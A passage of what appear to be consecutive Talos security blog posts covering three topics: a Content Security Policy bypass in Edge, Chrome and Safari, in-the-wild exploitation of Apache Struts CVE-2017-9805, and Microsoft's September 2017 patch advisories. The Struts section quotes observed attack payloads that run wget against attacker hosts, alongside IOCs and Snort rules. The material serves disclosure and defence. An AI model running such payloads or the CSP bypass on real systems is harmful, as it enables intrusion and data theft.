The vulnerabilities were discovered by Nicolai Grødum of Cisco.

Today, Talos is releasing details of vulnerabilities discovered in Microsoft Edge browser as well as older versions of Google Chrome (CVE-2017-5033) and browsers based on the Webkit such as Apple Safari (CVE-2017-2419) . An attacker may be able to exploit the vulnerabilities and bypass the Content Security Policy set by the server which may lead to disclosure of confidential information. Microsoft stated that this is by design and has declined to patch this issue.

Overview

One of the fundamental security mechanisms of a web application is the so called same-origin policy, prescribing which resources may be accessed by the application code. The essence of the same-origin policy is that it allows programmatic access to web resources only to the code that originates from the same server as the data that is being accessed.

For example, a script, executing within the context of a web browser, originating from the server good.example.com should be able to access data from the same server. On the other hand, a script originating from the server evil.example.com should not be able to access any data on good.example.com.

However, many vulnerabilities in web applications allowing the attacker to bypass the same-origin policy have been discovered. One particularly successful attack technique is Cross Site Scripting (XSS). XSS allows the attacker to inject remote code within the context of the original server code executing in the browser. To the browser, the injected code would appear to originate from the same server as the legitimate application therefore allowing access to local resources that can lead to the leak of potentially confidential data to the attacker or even application session hijacking.

Content Security Policy (CSP) is a mechanism designed to prevent XSS attacks by whitelisting servers that may be used as legitimate sources for the client side web application code. Cisco researchers have found a way to bypass the Content Security Policy and allow attackers to exploit the issue and potentially disclose confidential data by injecting otherwise excluded code.

Technical details - Talos-2017-0306 (CVE-2017-2419, CVE-2017-5033)

CSP defines the Content-Security-Policy HTTP header that allows creation of a whitelist of sources and instructs the browser to only execute resources from the allowed sources specified by the policy. Even if an attacker finds a way to inject a malicious script and successfully launch a XSS attack by injecting a <script> tag with a remote script source, the remote source will not be matched by the list of allowed sources and will not be executed by the browser.

The Content-Security-Policy HTTP header defines the script-src directive which configures CSP for script code. For example, the line

Content-Security-Policy: script-src 'self' https://good.example.com

allows scripts to be loaded only from the server the browser is currently visiting and an additional server good.example.com.

However, an information disclosure vulnerability exists within Microsoft Edge (not patched as of version 40.15063)), Google Chrome (patched) and Safari (patched). An attacker may be able to bypass the policy specified by the Content-Security-Policy header, causing an information leak.

There are three main components to an exploitation attempt: setting the Content-Security-Policy for the browser with "unsafe-inline" directive to allow for inline script code, then using window.open() to open a blank new window, and finally calling the document.write function to write code into the newly created blank window object in order to bypass CSP restrictions put on the document.

The issue, affecting the Microsoft Edge browser as well as older versions of Google Chrome and Firefox is that about:blank page has the same origin as its loading document, but with the CSP restrictions removed which allows for a successful exploitation.

More information about these vulnerabilities is available in the TALOS vulnerability report TALOS-2017-0306.

Discussion

Information disclosure vulnerabilities may not be as serious as the vulnerabilities allowing the attacker to launch remote code and escape the browser sandbox to access and control the system under attack.

However, XSS attacks that may allow an attacker to exfiltrate confidential data and even take over a user account are considered a serious issue. Content Security Policy is specifically designed with XSS attack prevention in mind and allows the server to whitelist trusted resources that are trusted to be safely executed by a web browser.

Many developers rely on CSP to protect them from XSS and other information disclosure attacks and trust browsers to support the standard. However, it seems that the implementation of CSP within different web browsers differs, allowing attackers to write browser specific code to bypass the content security policy defining the source of the allowed code.

Users are recommended to use browsers with more complete support for the Content security policy mechanism as well as browsers that keep up to date with all newly discovered security vulnerabilities, including information disclosure vulnerabilities such as the ones described in this post.

Affected versions

Microsoft Edge (not patched as of version 40.15063)

Google Chrome prior to version 57.0.2987.98 - (CVE-2017-5033)

iOS prior to version 10.3 - (CVE-2017-2419)

Apple Safari prior to version 10.1 - (CVE-2017-2419)

Coverage

The following Snort Rules will detect exploitation attempts. Note that additional rules may be released at a future date and current rules are subject to change pending additional vulnerability information. For the most current rule information, please refer to your FireSIGHT Management Center or Snort.org.

Snort Rule: 42112

This post authored by Nick Biasini with contributions from Alex Chiu.

Earlier this week, a critical vulnerability in Apache Struts was publically disclosed in a security advisory. This new vulnerability, identified as CVE-2017-9805, manifests due to the way the REST plugin uses XStreamHandler with an instance of XStream for deserialization without any type filtering. As a result, a remote, unauthenticated attacker could achieve remote code execution on a host running a vulnerable version of Apache Struts.

This isn't the only vulnerability that has been recently identified in Apache Struts. Earlier this year, Talos responded to a zero-day vulnerability that was under active exploitation in the wild. Talos has observed exploitation activity targeting CVE-2017-9805 in a way that is similar to how CVE-2017-5638 was exploited back in March 2017.

Details

Immediately after the reports surfaced related to this exploit, Talos began researching how it operated and began work to develop coverage to prevent successful exploitation. This was achieved and we immediately began seeing active exploitation in the wild. Thus far, exploitation appears to be primarily scanning activity, with outbound requests that appear to be identifying systems that are potentially vulnerable. Below is a sample of the type of HTTP requests we have been observing.

<string>/bin/sh</string><string>-c</string><string>wget -qO /dev/null http://wildkind[.]ru:8082/?vulnerablesite</string>

This would initiate a wget request that would write the contents of the HTTP response to /dev/null. This indicates it is purely a scanning activity that identifies to the remote server which websites are potentially vulnerable to this attack. This is also a strong possibility since it includes the compromised website in the URL. There was one other small variation that was conducting a similar request to the same website.

<string>/bin/sh</string><string>-c</string><string>wget -qO /dev/null http://wildkind[.]ru:8082/?`echo ...vulnerablesite...`</string>

During our research we found that the majority of the activity was trying to POST to the path of /struts2-rest-showcase/orders/3. Additionally most of the exploitation attempts are sending the data to wildkind[.]ru, with a decent amount of the requests originating from the IP address associated with wildkind[.]ru, 188.120.246[.]215.

Example of in the wild exploitation

Other exploitation attempts have been identified where Talos believes another threat actor appears to be exploiting the vulnerability for a different purpose. An example of the web requests found in the exploitation attempts can be found below.

<string>wget</string><string>hxxp://st2buzgajl.alifuzz[.]com/052</string>

Unfortunately, we were unable to retrieve the potentially malicious file that was being served at this particular location. If the previous Struts vulnerability is any indicator, the payloads could vary widely and encompass threats such as DDoS bots, spam bots, and various other malicious payloads.

IOCs

IP Addresses Observed:

• 188.120.246[.]215
• 101.37.175[.]165
• 162.158.182[.]26
• 162.158.111[.]235
• 141.101.76[.]226
• 141.101.105[.]240

Domains Contacted:

• wildkind[.]ru
• st2buzgajl.alifuzz[.]com

Commonly Used Path:

• /struts2-rest-showcase/orders/3

Mitigation

Apache has released a new version of Struts that resolves this issue. If you believe that you have a potentially vulnerable version of Apache struts there are two options: upgrade to Struts 2.5.13 / Struts 2.3.34 or remove the REST plugin if it's not actively being used. Instructions to achieve this are provided as part of the security bulletin and should be reviewed and tested before applying in a production environment. In the event it's not possible to upgrade or remove the REST plugin, limiting it to server normal pages and JSONs may help limit the risk the compromise.

Conclusion

This is the latest in a long line of vulnerabilities that are exposing servers to potential exploitation. In today's threat landscape a lot of attention is paid to endpoint systems being compromised, and with good reason, as it accounts for the majority of the malicious activity we observe on a daily basis. However, that does not imply that patching of servers should not be an extremely high priority. These types of systems, if compromised, can potentially expose critical data and systems to adversaries.

The vulnerability is yet another example of how quickly miscreants will move to take advantage of these types of issues. Within 48 hours of disclosure we were seeing systems activity exploiting the vulnerability. To their credit the researchers disclosed the vulnerability responsibly and a patch was available before disclosure occurred. However, with money at stake bad guys worked quickly to reverse engineer the issue and successfully develop exploit code to take advantage of it. In today's reality you no longer have weeks or months to respond to these type of vulnerabilities, it's now down to days or hours and every minute counts. Ensure you have protections in place or patches applied to help prevent your enterprise from being impacted.

Coverage

Talos has released the following Snort rule to address this vulnerability. Please note that additional rules may be released at a future date and current rules are subject to change pending additional vulnerability information. Firepower customers should use the latest update to their ruleset by updating their SRU. Open Source Snort Subscriber Rule Set customers can stay up to date by downloading the latest rule pack available for purchase on Snort.org.

Snort Rule: 44315



Network Security appliances such as NGFW, NGIPS, and Meraki MX can detect malicious activity associated with this threat.

Microsoft has released its monthly set of security advisories for vulnerabilities that have been identified and addressed in various products. This month's advisory release addresses 81 new vulnerabilities with 27 of them rated critical, 52 rated important, and 2 rated moderate. These vulnerabilities impact Edge, Hyper-V, Internet Explorer, Office, Remote Desktop Protocol, Sharepoint, Windows Graphic Display Interface, Windows Kernel Mode Drivers, and more. In addition, Microsoft is also releasing an update for Adobe Flash Player embedded in Edge and Internet Explorer.

Note that the Bluetooth vulnerabilities known as "BlueBorne" that affected Windows have been patched in this latest release. For more information, please refer to CVE-2017-8628.

Vulnerabilities Rated Critical

The following vulnerabilities are rated "critical" by Microsoft:

• CVE-2017-8747 - Internet Explorer Memory Corruption Vulnerability
• CVE-2017-8749 - Internet Explorer Memory Corruption Vulnerability
• CVE-2017-8750 - Microsoft Browser Memory Corruption Vulnerability
• CVE-2017-8731 - Microsoft Edge Memory Corruption Vulnerability
• CVE-2017-8734 - Microsoft Edge Memory Corruption Vulnerability
• CVE-2017-8751 - Microsoft Edge Memory Corruption Vulnerability
• CVE-2017-8755 - Microsoft Edge Memory Corruption Vulnerability
• CVE-2017-8756 - Microsoft Edge Memory Corruption Vulnerability
• CVE-2017-11766 - Microsoft Edge Memory Corruption Vulnerability
• CVE-2017-8757 - Microsoft Edge Remote Code Execution Vulnerability
• CVE-2017-8696 - Microsoft Graphics Component Remote Code Execution
• CVE-2017-8728 - Microsoft PDF Remote Code Execution Vulnerability
• CVE-2017-8737 - Microsoft PDF Remote Code Execution Vulnerability
• CVE-2017-0161 - NetBIOS Remote Code Execution Vulnerability
• CVE-2017-8649 - Scripting Engine Memory Corruption Vulnerability
• CVE-2017-8660 - Scripting Engine Memory Corruption Vulnerability
• CVE-2017-8729 - Scripting Engine Memory Corruption Vulnerability
• CVE-2017-8738 - Scripting Engine Memory Corruption Vulnerability
• CVE-2017-8740 - Scripting Engine Memory Corruption Vulnerability
• CVE-2017-8741 - Scripting Engine Memory Corruption Vulnerability
• CVE-2017-8748 - Scripting Engine Memory Corruption Vulnerability
• CVE-2017-8752 - Scripting Engine Memory Corruption Vulnerability
• CVE-2017-8753 - Scripting Engine Memory Corruption Vulnerability
• CVE-2017-11764 - Scripting Engine Memory Corruption Vulnerability
• CVE-2017-8682 - Win32k Graphics Remote Code Execution Vulnerability
• CVE-2017-8686 - Windows DHCP Server Remote Code Execution Vulnerability
• CVE-2017-8676 - Windows GDI+ Information Disclosure Vulnerability

The following briefly describes these vulnerabilities.

CVE-2017-8747, CVE-2017-8749 - Internet Explorer Memory Corruption Vulnerability

Two vulnerabilities have been identified in Internet Explorer that could result in remote code execution in the context of the current user. These vulnerabilities manifest due to improper handling of objects in memory when attempting to render a webpage. Both vulnerabilities could be exploited if, for example, a user visits a specially crafted webpage that exploits one of these flaws.

CVE-2017-8750 - Microsoft Browser Memory Corruption Vulnerability

A vulnerability have been identified in Edge and Internet Explorer that could result in remote code execution in the context of the current user. This vulnerability manifests due to improper handling of objects in memory when attempting to render a webpage. This vulnerability could be exploited if, for example, a user visits a specially crafted webpage that exploits this flaw.

Multiple CVEs - Microsoft Edge Memory Corruption Vulnerability

Multiple vulnerabilities have been identified in Microsoft Edge that could allow an attacker to execute arbitrary code on an affected host. These vulnerabilities manifest due to improper handling of objects in memory. Successful exploitation of this vulnerability would result in arbitrary code execution in the context of the current user. Users who visit a specially crafted web page under the control of the attacker could be exploited.

The following is a list of CVEs that reflect these vulnerabilities:

• CVE-2017-8731
• CVE-2017-8734
• CVE-2017-8751
• CVE-2017-8755
• CVE-2017-8756
• CVE-2017-11766

CVE-2017-8757 - Microsoft Edge Remote Code Execution Vulnerability

A vulnerability have been identified in Edge that could result in remote code execution in the context of the current user. This vulnerability manifests due to improper handling of objects in memory when attempting to render a webpage. This vulnerability could be exploited if, for example, a user visits a specially crafted webpage that exploits this flaw. Alternatively, an attacker could embed an ActiveX control marked "safe for initialization" within a Microsoft Office document that "hosts the browser rendering engine" and socially engineer the user to open the malicious document.

CVE-2017-8696 - Microsoft Graphics Component Remote Code Execution Vulnerability

A vulnerability has been identified in Windows Uniscribe that could allow an attacker to remotely execute arbitrary code on an affected host. This vulnerability manifests due to improper handling of objects in memory. Exploitation of this vulnerability could be achieved if a user navigates to a malicious web page or opens a malicious file designed to exploit this vulnerability. Successful exploitation would result in arbitrary code execution in the context of the current user.

CVE-2017-8728, CVE-2017-8737 - Microsoft PDF Remote Code Execution Vulnerability

Two vulnerabilities in the Microsoft Windows PDF library have been identified that could allow an attacker to execute arbitrary code on a targeted host. These vulnerabilities manifest due to improper handling of objects in memory. Successful exploitation of these vulnerabilities would result in arbitrary code execution in the context of the current user. Users who open a specially crafted PDF file or who visit a web page containing a specially crafted PDF could exploit these vulnerabilities.

CVE-2017-0161 - NetBIOS Remote Code Execution Vulnerability

A vulnerability in NetBT Session Services has been identified that could allow an attacker to execute arbitrary code on the targeted host remotely. This vulnerability manifests as a race condition "when NetBT fails to maintain certain sequencing requirements." An attacker who sends specially crafted NetBT Session Service packets to the targeted system could exploit this vulnerability and achieve remote code execution.

Multiple CVEs - Scripting Engine Memory Corruption Vulnerability

Multiple vulnerabilities have been identified in the Microsoft Browser JavaScript engine that could allow remote code execution to occur in the context of the current user. These vulnerabilities manifest due to improper handling of objects in memory, resulting in memory corruption. Exploitation of these vulnerabilities is achievable if a user visits a specially crafted web page that contains JavaScript designed to exploit one or more of these vulnerabilities.

The following is a list of CVEs that reflect these vulnerabilities:

• CVE-2017-8649
• CVE-2017-8660
• CVE-2017-8729
• CVE-2017-8738
• CVE-2017-8740
• CVE-2017-8741
• CVE-2017-8748
• CVE-2017-8752
• CVE-2017-8753
• CVE-2017-11764

CVE-2017-8682 - Win32k Graphics Remote Code Execution Vulnerability

A vulnerability in the Windows font library has been identified that could allow an attacker to execute arbitrary code on an affected host. This vulnerability manifests due to improper handling of embedded fonts. Successful exploitation of this vulnerability would result in arbitrary code execution in the context of the current user. For this vulnerability to be exploited, a user would need to either navigate to a specially crafted website or open a specially crafted document that is designed to exploit this flaw.

CVE-2017-8686 - Windows DHCP Server Remote Code Execution Vulnerability

A vulnerability has been identified in the Windows Server DHCP service where remote code execution could be achieved if exploited. This vulnerability manifests as a result of the service incorrectly handling DHCP packets. Successful exploitation could allow an attacker to remotely execute code on an affected host or create a denial of service condition. For this vulnerability to be exploited, an attacker would need to send a specially crafted packet to the DHCP server that is set to failover mode. If the server is not set to failover mode, the attack will not succeed.

CVE-2017-8676 - Windows GDI+ Information Disclosure Vulnerability

An information disclosure vulnerability have been identified in the Windows Graphics Device Interface+ (GDI+) that could allow an attacker to obtain potentially sensitive information about the affected host. This vulnerability manifests due to the Windows GDI+ component improperly handling objects in memory. An attacker who runs a specially crafted executable could exploit this vulnerability and leverage the information to further compromise the host.

Vulnerabilities Rated Important

The following vulnerabilities are rated "important" by Microsoft:

• CVE-2017-8759 - .NET Framework Remote Code Execution Vulnerability
• CVE-2017-9417 - Broadcom BCM43xx Remote Code Execution Vulnerability
• CVE-2017-8746 - Device Guard Security Feature Bypass Vulnerability
• CVE-2017-8695 - Graphics Component Information Disclosure Vulnerability
• CVE-2017-8704 - Hyper-V Denial of Service Vulnerability
• CVE-2017-8706 - Hyper-V Information Disclosure Vulnerability
• CVE-2017-8707 - Hyper-V Information Disclosure Vulnerability
• CVE-2017-8711 - Hyper-V Information Disclosure Vulnerability
• CVE-2017-8712 - Hyper-V Information Disclosure Vulnerability
• CVE-2017-8713 - Hyper-V Information Disclosure Vulnerability
• CVE-2017-8733 - Internet Explorer Spoofing Vulnerability
• CVE-2017-8628 - Microsoft Bluetooth Driver Spoofing Vulnerability
• CVE-2017-8736 - Microsoft Browser Information Disclosure Vulnerability
• CVE-2017-8597 - Microsoft Edge Information Disclosure Vulnerability
• CVE-2017-8643 - Microsoft Edge Information Disclosure Vulnerability
• CVE-2017-8648 - Microsoft Edge Information Disclosure Vulnerability
• CVE-2017-8754 - Microsoft Edge Security Feature Bypass Vulnerability
• CVE-2017-8724 - Microsoft Edge Spoofing Vulnerability
• CVE-2017-8758 - Microsoft Exchange Cross-Site Scripting Vulnerability
• CVE-2017-11761 - Microsoft Exchange Information Disclosure Vulnerability
• CVE-2017-8630 - Microsoft Office Memory Corruption Vulnerability
• CVE-2017-8631 - Microsoft Office Memory Corruption Vulnerability
• CVE-2017-8632 - Microsoft Office Memory Corruption Vulnerability
• CVE-2017-8744 - Microsoft Office Memory Corruption Vulnerability
• CVE-2017-8725 - Microsoft Office Publisher Remote Code Execution
• CVE-2017-8567 - Microsoft Office Remote Code Execution
• CVE-2017-8745 - Microsoft SharePoint Cross Site Scripting Vulnerability
• CVE-2017-8629 - Microsoft SharePoint XSS Vulnerability
• CVE-2017-8742 - PowerPoint Remote Code Execution Vulnerability
• CVE-2017-8743 - PowerPoint Remote Code Execution Vulnerability
• CVE-2017-8714 - Remote Desktop Virtual Host Remote Code Execution Vulnerability
• CVE-2017-8739 - Scripting Engine Information Disclosure Vulnerability
• CVE-2017-8692 - Uniscribe Remote Code Execution Vulnerability
• CVE-2017-8675 - Win32k Elevation of Privilege Vulnerability
• CVE-2017-8720 - Win32k Elevation of Privilege Vulnerability
• CVE-2017-8683 - Win32k Graphics Information Disclosure Vulnerability
• CVE-2017-8677 - Win32k Information Disclosure Vulnerability
• CVE-2017-8678 - Win32k Information Disclosure Vulnerability
• CVE-2017-8680 - Win32k Information Disclosure Vulnerability
• CVE-2017-8681 - Win32k Information Disclosure Vulnerability
• CVE-2017-8687 - Win32k Information Disclosure Vulnerability
• CVE-2017-8702 - Windows Elevation of Privilege Vulnerability
• CVE-2017-8684 - Windows GDI+ Information Disclosure Vulnerability
• CVE-2017-8685 - Windows GDI+ Information Disclosure Vulnerability
• CVE-2017-8688 - Windows GDI+ Information Disclosure Vulnerability
• CVE-2017-8710 - Windows Information Disclosure Vulnerability
• CVE-2017-8679 - Windows Kernel Information Disclosure Vulnerability
• CVE-2017-8708 - Windows Kernel Information Disclosure Vulnerability
• CVE-2017-8709 - Windows Kernel Information Disclosure Vulnerability
• CVE-2017-8719 - Windows Kernel Information Disclosure Vulnerability
• CVE-2017-8716 - Windows Security Feature Bypass Vulnerability
• CVE-2017-8699 - Windows Shell Remote Code Execution Vulnerability

The following briefly describes these vulnerabilities.

CVE-2017-8759 - .NET Framework Remote Code Execution Vulnerability

A vulnerability has been identified in the Microsoft .NET Framework that could allow an attacker to execute arbitrary code on an affected device. This vulnerability manifests due to improperly handling untrusted input. Successful exploitation could result in an attacker being able to execute arbitrary code in the context of the current user. A user who opens a malicious document or application could be exploited and compromised via this vulnerability.

CVE-2017-9417 - Broadcom BCM43xx Remote Code Execution Vulnerability

A vulnerability has been identified in the Broadcom chipsets used in HoloLens that could allow an attacker to execute arbitrary code on an affected device. This vulnerability manifests due to improper handling of Wi-fi packets. Successful exploitation of this vulnerability could result in an attacker being able to take full control of the device with administrator privileges.

CVE-2017-8746 - Device Guard Security Feature Bypass Vulnerability

A vulnerability had been identified in Device Guard that could allow an attacker bypass a security control and inject malicious code into a Windows Powershell session. This vulnerability manifests as a flaw in how the Device Guard Code Integrity policy is implemented. An attacker who has access to a local machine could inject malicious into a script that is trusted by the Code Integrity policy. As a result, the injected code could run with the same trust level as the script, bypassing the Code Integrity policy control.

CVE-2017-8695 - Graphics Component Information Disclosure Vulnerability

An information disclosure vulnerability has been identified in Windows Uniscribe that could allow an attacker to obtain important system information. This information could then be used to further compromise a user's system via another vulnerability. Exploitation of this vulnerability could be achieved if a user opens a specially crafted document or visited a malicious web page that is designed to exploit this vulnerability.

CVE-2017-8704 - Hyper-V Denial of Service Vulnerability

A denial of service vulnerability has been identified in Microsoft Hyper-V that could cause the host machine to crash. This vulnerability manifests due to the host server improperly validating input from a privileged user within a guest operating system. An attacker who has privileged access in a guest operating system on the affected host could execute a specially crafted application could trigger this vulnerability.

Multiple CVEs - Hyper-V Information Disclosure Vulnerability

Multiple information disclosure vulnerabilities have been identified in Windows Hyper-V that could allow an attacker to access sensitive information on the Hyper-V host operating system. These vulnerabilities manifest due to Hyper-V improperly validating input from an authenticated user inside a guest operating system. An attacker who has access to a guest VM and executes a specially crafted application within the guest VM could exploit this vulnerability and obtain information on the Hyper-V host.

The following is a list of CVEs that reflect these vulnerabilities:

• CVE-2017-8706
• CVE-2017-8707
• CVE-2017-8711
• CVE-2017-8712
• CVE-2017-8713

CVE-2017-8733 - Internet Explorer Spoofing Vulnerability

A spoofing vulnerability in Internet Explorer has been identified that could allow an attacker to trick the user into believing they were visiting a legitimate web site. This vulnerability manifests due to Internet Explorer incorrectly handling specific HTML content. A user who navigates to a specially crafted web page under the control of the attacker could be exploited. As a result, this malicious website could then be used to serve spoofed content to the user or to serve as part of a exploit chain designed to compromise the affected host.

CVE-2017-8628 - Microsoft Bluetooth Driver Spoofing Vulnerability

A spoofing vulnerability has been identified in Microsoft's implementation of the Bluetooth stack and has been disclosed as part of "BlueBorne" series of vulnerabilities. This vulnerability could allow an attacker to perform a man-in-the-middle attack and force a user's device to "unknowingly route traffic through the attacker's computer." For this exploit to be possible, an attacker would need to be within physical proximity to the targeted device and the targeted device would need to have Bluetooth enabled. Note that if both of these conditions are satisfied, an attacker could "initiate a Bluetooth connection to the target computer without the user's knowledge."

CVE-2017-8736 - Microsoft Browser Information Disclosure Vulnerability

A vulnerability in Microsoft Edge and Internet Explorer has been identified that could allow an attacker to obtain information regarding the user's current session. This vulnerability manifests due to the browser improperly verifying parent domains in certain functionality. An attacker who socially engineers a user to visiting a specially crafted web page could exploit this flaw and obtain information that is specific to the parent domain.

CVE-2017-8597, CVE-2017-8648 - Microsoft Edge Information Disclosure Vulnerability

Multiple vulnerabilities in Microsoft Edge have been identified that could allow an attacker to discover sensitive information regarding the targeted system. These vulnerabilities manifest due to improper handling of objects in memory. Successful exploitation of these vulnerabilities could given an attacker the necessary information to further exploit additional vulnerabilities on the system.

CVE-2017-8643 - Microsoft Edge Information Disclosure Vulnerability

An vulnerability in Microsoft Edge has been identified that could permit the disclosure of potentially sensitive information. This vulnerability manifests due to Microsoft Edge improperly handling clipboard events. Exploitation of this vulnerability is achievable if an attacker socially engineers a user to open a specially crafted web page that exploits this flaw. As long has this web page remains open, an attacker would be able to able to gain knowledge of clipboard activities.

CVE-2017-8754 - Microsoft Edge Security Feature Bypass Vulnerability

A vulnerability in Microsoft Edge has been identified that could allow an attacker to bypass the Content Security Policy (CSP) feature. This vulnerability manifests due to improperly validating certain specially crafted documents. Successful exploitation could allow an attacker to redirect users to a malicious web page. Users who visit a specially crafted web page under the control of the attacker could be exploited. Alternatively, users who visit a compromised web page or who get served a malicious advertisement an attacker has injected into an advertising network could be exploited.

CVE-2017-8724 - Microsoft Edge Spoofing Vulnerability

A vulnerability in Edge has been identified that could allow an attacker to spoof content on a targeted host. This vulnerability manifests due to improper parsing of HTTP content. Successful exploitation of this vulnerability would result in the user being redirected to a web site of the attacker's choosing. This web site could then spoof content or serve as part of an exploit chain whereby the user could be exploited via another vulnerability. Scenarios where a user could be attacked include email or instant message vectors where the user clicks on a malicious link, or the user navigates to a specially crafted web page under the control of the attacker.

CVE-2017-8758 - Microsoft Exchange Cross-Site Scripting Vulnerability

A cross-site scripting vulnerability in Microsoft Exchange has been identified that could allow an attacker to perform a content/script injection attack. This vulnerability manifests due to Exchange failing to properly handle web requests. An attacker who sends an intended victim a specially crafted email containing a malicious link could exploit this vulnerability and potentially trick the user into disclosing sensitive information.

CVE-2017-11761 - Microsoft Exchange Information Disclosure Vulnerability

A vulnerability in Microsoft Exchange has been identified that could allow an attacker to obtain information regarding the affected server's local network. This vulnerability manifests as an information disclosure flaw due to improper input sanitization. An attacker who includes specially crafted tags in a Calendar-related message and sends this to an affected Exchange server could exploit this flaw and enumerate internal hosts assigned an RFC 1918 IP address. This information could then be used as part of a larger attack.

Multiple CVEs - Microsoft Office Memory Corruption Vulnerability

Multiple vulnerabilities have been identified affecting Microsoft Office that could allow an attacker to execute arbitrary code on an affected system. These vulnerabilities manifest due to Office improperly handling objects in memory. A users who opens a maliciously crafted Office document could be exploited, resulting in arbitrary code execution of the attacker's choice in the context of the current user. Scenarios where this could occur include email-based attacks, where the attacker sends the victim a message with a malicious attachment, or web-based attacks where the user downloads and opens a malicious Office document.

The following is a list of CVEs that reflect these vulnerabilities:

• CVE-2017-8630
• CVE-2017-8631
• CVE-2017-8632
• CVE-2017-8744

CVE-2017-8725 - Microsoft Office Publisher Remote Code Execution

A vulnerability has been identified affecting Microsoft Office Publisher that could allow an attacker to execute arbitrary code on an affected system. This vulnerability manifests due to Publisher improperly handling objects in memory. A users who opens a maliciously crafted Publisher document could be exploited, resulting in arbitrary code execution of the attacker's choice in the context of the current user. Scenarios where this could occur include email-based attacks, where the attacker sends the victim a message with a malicious attachment, or web-based attacks where the user downloads and opens a malicious Publisher document.

CVE-2017-8567 - Microsoft Office Remote Code Execution

A vulnerability has been identified affecting Microsoft Office that could allow an attacker to execute arbitrary code on an affected system. This vulnerability manifests due to Office improperly handling objects in memory. A user who opens a maliciously crafted document could be exploited, resulting in arbitrary code execution of the attacker's choice in the context of the current user. Scenarios where this could occur include email-based attacks, where the attacker sends the victim a message with a malicious attachment, or web-based attacks where the user downloads and opens a malicious Office document. Note that Preview Pane is not an attack vector for this vulnerability.

CVE-2017-8745, CVE-2017-8629 - Microsoft SharePoint XSS Vulnerability

Two vulnerabilities in Microsoft Sharepoint have been identified that could could allow an attacker to execute a cross-site scripting (XSS) attack. These vulnerabilities manifest due to Sharepoint Server improperly sanitizing specific web requests from a user. Successful exploitation of these flaws could allow an attacker to execute script in the context of the current user, read content that the attacker would not have permission to otherwise view, or execute actions on behalf of the affected user.

CVE-2017-8742, CVE-2017-8743 - PowerPoint Remote Code Execution Vulnerability

Two vulnerabilities have been identified affecting Microsoft Office Powerpoint that could allow an attacker to execute arbitrary code on an affected system. These vulnerabilities manifest due to Powerpoint improperly handling objects in memory. A user who opens a maliciously crafted Powerpoint document could be exploited, resulting in arbitrary code execution of the attacker's choice in the context of the current user. Scenarios where this could occur include email-based attacks, where the attacker sends the victim a message with a malicious attachment, or web-based attacks where the user downloads and opens a malicious Powerpoint document.

CVE-2017-8714 - Remote Desktop Virtual Host Remote Code Execution Vulnerability

A vulnerability has been identified in the VM Host Agent Service of Remote Desktop Virtual Host that could allow an attacker to execute arbitrary code on an affected host. This vulnerability manifests due to improperly validating input from an authenticated user within a guest operating system. Exploitation of this flaw is achievable if an attacker issues a "specially crafted certificate" within a guest operating system, causing the "VM host agent service on the host operating system to execute arbitrary code." Microsoft notes that the Remote Desktop Virtual Host role is not enabled by default.

CVE-2017-8739 - Scripting Engine Information Disclosure Vulnerability

A vulnerability in Microsoft Edge has been identified that could disclose sensitive information to an attacker. This vulnerability manifests due to improper handling of objects in memory. Successful exploitation of this vulnerability would result in an attacker obtaining information that could then be used to further exploit the system. Users who visit a specially crafted web page under the control of the attacker could be exploited.

CVE-2017-8692 - Uniscribe Remote Code Execution Vulnerability

An arbitrary code execution vulnerability has been identified in Windows Uniscribe that could allow an attacker to execute code in the context of the current user. This vulnerability manifests due to Uniscribe improperly handling objects in memory. Exploitation of this vulnerability could be achieved if a user navigates to a malicious web page or opens a malicious file designed to exploit this vulnerability.

CVE-2017-8593 - Win32k Elevation of Privilege Vulnerability

A vulnerability in Windows Kernel Mode Drivers has been identified that could allow a privilege escalation attack to occur. This vulnerability manifests due to improper handling of objects in memory. Successful exploitation of this vulnerability could result in an attacker being able to execute arbitrary code in kernel mode. An attacker who executes a specially crafted executable could exploit this vulnerability and as a result, gain full control of the affected system.

CVE-2017-8720 - Win32k Elevation of Privilege Vulnerability

A vulnerability in the Win32k component in Windows has been identified that could allow a privilege escalation attack to occur. This vulnerability manifests due to improper handling of objects in memory. Successful exploitation of this vulnerability would result in an attacker obtaining administrator privileges on the targeted system. Users who run a specially crafted executable that exploits this vulnerability could leverage this vulnerability to perform actions as an administrator on the affected system.

CVE-2017-8683 - Win32k Graphics Information Disclosure Vulnerability

An information disclosure vulnerability has been identified in the Windows Graphics Component that could allow an attacker to gain information about the host. This vulnerability manifests due to the Graphics Component improperly handling objects in memory. An attacker who runs a specially crafted executable could exploit this vulnerability and leverage the information to further compromise the host.

CVE-2017-8678 - Win32k Information Disclosure Vulnerability

An information disclosure vulnerability has been identified in the Windows kernel that could allow an attacker to gain information about the host. This vulnerability manifests due to the kernel improperly handling objects in memory. An attacker who runs a specially crafted executable could exploit this vulnerability and leverage the information to further compromise the host.

Multiple CVEs - Win32k Information Disclosure Vulnerability

Multiple information disclosure vulnerabilities have been identified in the Windows Graphics Device Interface+ (GDI+) component that could allow an attacker to gain information about the host. This vulnerability manifests due to the GDI+ component improperly handling objects in memory. An attacker who runs a specially crafted executable could exploit this vulnerability and leverage the information to further compromise the host.

The following is a list of CVEs that reflect these vulnerabilities:

• CVE-2017-8677
• CVE-2017-8680
• CVE-2017-8681

CVE-2017-8687 - Win32k Information Disclosure Vulnerability

An information disclosure vulnerability has been identified in the Windows kernel that could allow an attacker to gain information which could lead to a Kernel Address Space Layout Randomization (KASLR) bypass. This vulnerability manifests due to the kernel improperly handling objects in memory. An attacker who runs a specially crafted executable could exploit this vulnerability and obtain the "memory address of a kernel object," allowing an attacker to leverage the information to further compromise the host.

CVE-2017-8702 - Windows Elevation of Privilege Vulnerability

A vulnerability in the Windows Error Reporting (WER) has been identified that could allow a privilege escalation attack to occur. Successful exploitation of this vulnerability would result in an attacker obtaining administrator privileges on the targeted system.

Multiple CVEs - Windows GDI+ Information Disclosure Vulnerability

Multiple information disclosure vulnerabilities have been identified in the Windows Graphics Device Interface+ (GDI+) that could allow an attacker to obtain potentially sensitive information about the affected host. These vulnerabilities manifest due to the Windows GDI+ component improperly handling objects in memory. An attacker who runs a specially crafted executable could exploit this vulnerability and leverage the information to further compromise the host.

The following is a list of CVEs that reflect these vulnerabilities:

• CVE-2017-8684
• CVE-2017-8685
• CVE-2017-8688

CVE-2017-8710 - Windows Information Disclosure Vulnerability

An information disclosure vulnerability in the Windows System Information Console has been identified that could allow an attacker to read arbitrary files on an affected system. This vulnerability manifests due to improper parsing of XML input which contains a reference to an external entity. An attacker who creates specially crafted file containing XML content and either opens the file or socially engineers an user to open the file on an affected system could exploit this vulnerability.

Multiple CVEs - Windows Kernel Information Disclosure Vulnerability

